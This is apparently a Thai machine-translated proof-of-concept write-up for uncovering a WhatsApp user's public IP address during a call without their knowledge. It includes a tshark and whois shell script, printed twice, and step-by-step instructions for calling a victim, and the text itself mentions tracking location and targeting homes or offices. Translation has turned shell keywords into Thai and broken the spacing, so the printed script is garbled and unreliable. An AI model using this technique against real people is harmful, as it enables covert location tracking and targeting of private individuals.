โปรแกรมนี้มีวัตถุประสงค์เพื่อการศึกษาเท่านั้น อย่าใช้โดยไม่ได้รับอนุญาต ข้อจำกัดความรับผิดชอบตามปกติโดยเฉพาะอย่างยิ่งความจริงที่ว่าฉัน (Bhdresh) ไม่รับผิดชอบต่อความเสียหายใด ๆ ที่เกิดจากการใช้ข้อมูลหรือการทำงานโดยตรงหรือทางอ้อมโดยโปรแกรมเหล่านี้ ผู้เขียนหรือผู้ให้บริการอินเทอร์เน็ตใด ๆ ไม่รับผิดชอบต่อเนื้อหาหรือการใช้โปรแกรมเหล่านี้ในทางที่ผิดหรืออนุพันธ์ใด ๆ โดยการใช้โปรแกรมนี้คุณยอมรับความจริงที่ว่าความเสียหายใด ๆ (Dataloss, ระบบขัดข้อง, การประนีประนอมระบบ ฯลฯ ) ที่เกิดจากการใช้โปรแกรมเหล่านี้ไม่ใช่ความรับผิดชอบของ Bhdresh
ในที่สุดนี่คือการพัฒนาส่วนบุคคลโปรดเคารพปรัชญาและอย่าใช้มันเพื่อสิ่งที่ไม่ดี!
https://vimeo.com/577355374
แอพพลิเคชั่น WhatsApp เวอร์ชันล่าสุดบนแพลตฟอร์มทั้งหมดมีความเสี่ยงที่จะเปิดเผยข้อมูล IP ของผู้ใช้ WhatsApp จากระยะไกล
เป็นที่สังเกตว่าในระหว่างการโทร Whatsapp (เสียง / วิดีโอ) แอปพลิเคชันที่ด้านผู้โทรพยายามสร้างการเชื่อมต่อโดยตรงกับที่อยู่ IP สาธารณะของอุปกรณ์ผู้รับ ด้วยการกรองที่อยู่ IP ของเซิร์ฟเวอร์ Facebook และ WhatsApp จากโฮสต์ปลายทางเป็นไปได้ที่จะเปิดเผยที่อยู่ IP สาธารณะที่ถูกต้องของผู้ใช้ WhatsApp เป้าหมายโดยที่เขาไม่ทราบ
ต่อไปนี้เป็นสคริปต์อย่างรวดเร็วเพื่อใช้ประโยชน์จากช่องโหว่นี้
#!/bin/sh
ตัวกรอง = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
echo "กด Enter แล้วโทรหาเป้าหมายของคุณ"
อ่านบรรทัด
tshark -i eth0 -l -t ฟิลด์ -f "udp" -e ip.dst -y "$ filter" -y "ip.dst! = 192.168.0.0/16 และ ip.dst! = 10.0.0.0/8 และ ip.dst! = 172.16.0.0/12 "| ในขณะที่อ่านบรรทัดทำ whois $ line> /tmp /b
ตัวกรอง = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
ถ้า ["$ filter" -gt 0]; จากนั้น targetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetInfo fi เสร็จสิ้น
ความเป็นไปได้ในการแมปผู้ใช้ WhatsApp ด้วย IP สาธารณะของพวกเขาจะไม่เพียง แต่เปิดเผยข้อมูลตำแหน่งของผู้ใช้ WhatsApp แต่ยังสามารถใช้ในทางที่ผิดเพื่อติดตามการเคลื่อนไหวทางกายภาพของพวกเขาโดยการรักษาประวัติสถานที่ การแมปโดยตรงระหว่างข้อมูลผู้ใช้กับ IP สามารถนำไปใช้ในทางที่ผิดเพื่อติดตามพฤติกรรมการท่องของผู้ใช้และมีอิทธิพลต่อเขา
นอกจากนี้ IP สาธารณะสามารถถูกเอาเปรียบเพื่อเปิดการโจมตีเป้าหมายไปยังบ้านหรือสำนักงานผู้ใช้ WhatsApp
ผู้ใช้: USERA มีรายละเอียด WhatsApp ของ UserB
สภาพแวดล้อม: N/A
เบราว์เซอร์: N/A
แอพเวอร์ชัน: <= แอปพลิเคชัน WhatsApp เวอร์ชันล่าสุดบนแพลตฟอร์มใด ๆ
OS: แพลตฟอร์มทั้งหมดยกเว้นเว็บ
คำอธิบาย: USERA โทร whatsapp ไปยัง userb และรวบรวมข้อมูล IP สาธารณะของเขาโดยไม่ต้องมีความรู้ของผู้ใช้ วิดีโอ POC เพื่อความเข้าใจขั้นตอนที่ดีขึ้น: https://vimeo.com/577355374
ขั้นตอนที่ 1: เริ่มต้นฮอตสปอต WiFi บนเครื่องโจมตีและเชื่อมต่อโทรศัพท์ผู้โจมตีเข้ากับผู้โจมตี SSID
ขั้นตอนที่ 2: เริ่มสคริปต์ POC (ด้านล่าง) บนเครื่องโจมตีซึ่งตอนนี้ทำหน้าที่เป็นเราเตอร์สำหรับโทรศัพท์ผู้โจมตี
#!/bin/sh
ตัวกรอง = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
echo "กด Enter แล้วโทรหาเป้าหมายของคุณ"
อ่านบรรทัด
tshark -i eth0 -l -t ฟิลด์ -f "udp" -e ip.dst -y "$ filter" -y "ip.dst! = 192.168.0.0/16 และ ip.dst! = 10.0.0.0/8 และ ip.dst! = 172.16.0.0/12 "| ในขณะที่อ่านบรรทัดทำ whois $ line> /tmp /b
ตัวกรอง = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
ถ้า ["$ filter" -gt 0]; จากนั้น targetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetInfo fi เสร็จสิ้น
ขั้นตอนที่ 3: โทรหาผู้ใช้ WhatsApp ใด ๆ แบบสุ่มเพื่อจับภาพที่อยู่ IP ของเซิร์ฟเวอร์เพื่อกรอง
ขั้นตอนที่ 4: โทรหาเหยื่อบน WhatsApp ของเขา
ขั้นตอนที่ 5: ถอดสายเมื่อจัดตั้งขึ้นเมื่อจัดตั้งขึ้น
ขั้นตอนที่ 6: สคริปต์จะเปิดเผยที่อยู่ IP สาธารณะของเป้าหมาย
ขั้นตอนที่ 7: ตรวจสอบที่อยู่ IP สาธารณะบนโทรศัพท์เป้าหมาย